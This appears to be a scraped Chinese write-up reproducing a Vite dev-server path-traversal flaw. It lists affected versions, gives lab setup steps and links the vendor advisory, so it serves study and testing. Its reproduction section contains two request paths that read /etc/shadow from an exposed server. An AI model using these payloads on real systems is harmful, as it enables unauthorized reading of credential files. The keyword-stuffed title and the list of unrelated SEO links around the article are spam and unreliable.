当前位置: 首页 > wzjs >正文

百度快照入口北京网站seo服务

wzjs 2025/8/12 8:35:14
百度快照入口,北京网站seo服务,专门做服装批发的网站吗,网店要怎么运营漏洞描述 该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。 利用条件:仅在 Vite 启动时使用了 --host 或配置…

漏洞描述

该漏洞是由于 Vite 开发服务器在处理特定 URL 请求时,未对请求路径进行严格的安全检查和限制所致。攻击者可以利用这一漏洞绕过保护机制,未经授权地访问项目根目录之外的敏感文件。

利用条件:仅在 Vite 启动时使用了 --host 或配置文件设置了 server.host 导致对外网暴露的开发环境中才会受影响。

影响版本

  • 6.2.0 <= Vite <= 6.2.4
  • 6.1.0 <= Vite <= 6.1.3
  • 6.0.0 <= Vite <= 6.0.13
  • 5.0.0 <= Vite <= 5.4.16
  • Vite <= 4.5.11

环境搭建

这里使用漏洞次新版:vite 6.2.4

1. 安装node 和 npm

# 添加 NodeSource 仓库(安装 18.x 或 20.x 都可以)
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
# 安装 node 和 npm
sudo apt install -y nodejs
# 验证安装
node -v
npm -v

2. 创建项目,按照如下所示操作

npm create vite@latest
  • 项目名回车默认:vite-project
  • 选择框架 Vanilla
  • 选择 JavaScript

3. 项目生成好后,接下来运行项目

cd vite-project
#手动降级vite到 6.2.4 版本
npm install vite@6.2.4 --save-dev
#查看版本
npx vite -v

4. 新建 vite.config.js

// vite.config.js
export default {server: {host: true}
}

5. 最后运行

npm install
npm run dev

漏洞复现

/etc/shadow?.svg?.wasm?init
#或者
/@fs/x/x/x/vite-project/?/../../../../../etc/shadow?import&?raw

参考:https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x

http://www.dtcms.com/wzjs/315219.html

相关文章:

  • 商洛网站制作百家号seo
  • 重庆网站设计总部营销型外贸网站建设
  • 用dreamever如何建设网站百度一下官网网址
  • 表格布局的网站北京外包seo公司
  • 电子商务网站建设专业主修课程搜索引擎有哪些分类
  • 外包做的网站 需要要源代码吗最常用的网页制作软件
  • 柳市做公司网站电脑培训学校排名
  • 网站制作资质网店代运营诈骗
  • 空调维修技术支持东莞网站建设app拉新平台哪个好佣金高
  • 买奢侈品代工厂做的产品的网站百度首页的ip地址
  • 晋江网站建设晋江如何网页优化
  • 江西医疗网站备案前置审批福州seo公司排名
  • 软件行业发展前景百度seo搜索引擎优化培训
  • java做网站访问量并发关键路径
  • 东莞优秀网站建设企业网站建设哪家好
  • 东莞网站建设公司口碑排名个人如何建立免费网站
  • 网站设计_网站建设_手机网站建设今天的新闻内容
  • 商务网站建设步骤有几个头条搜索
  • 包头做网站哪家好无线新闻台直播app下载
  • 做网站建设的电销教育机构加盟
  • 浙江省建设厅网站高工北京网站优化企业
  • 发票商品名称网站建设下载百度导航app
  • 泉州哪里做网站开发武汉seo服务外包
  • 成品网站建设哪家好网络营销专业大学排名
  • 池州网站建设费用吉林网络推广公司
  • 网站菜单代码山东16市最新疫情
  • 楚雄做网站张文宏说上海可能是疫情爆发
  • 南京移动网站设计seo交互论坛
  • 百度文库ai助手网页版内部优化
  • 领地免费网站开发网络推广怎么找客户资源